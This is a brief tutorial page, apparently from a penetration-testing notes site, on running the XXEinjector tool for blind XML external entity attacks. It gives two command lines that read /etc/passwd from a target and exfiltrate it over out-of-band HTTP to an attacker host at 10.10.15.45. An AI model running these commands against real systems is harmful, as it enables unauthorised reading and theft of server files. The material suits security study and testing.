XXE Injector

Options 1

First we need to save the request to blind.req

Then just edit the XML content and make sure to put the XXEINJECT

ruby XXEinjector.rb --host=10.10.15.45 --httpport=8000 --file=../blind.req --path=/etc/passwd --oob=http --phpfilter

Option 2

ruby XXEinjector.rb --host=10.10.15.45 --httpport=8000 --file=normal.req --path=/etc/passwd --oob=http --phpfilter
PreviousBlind Data ExfiltrationNextXXE Prevention

Last updated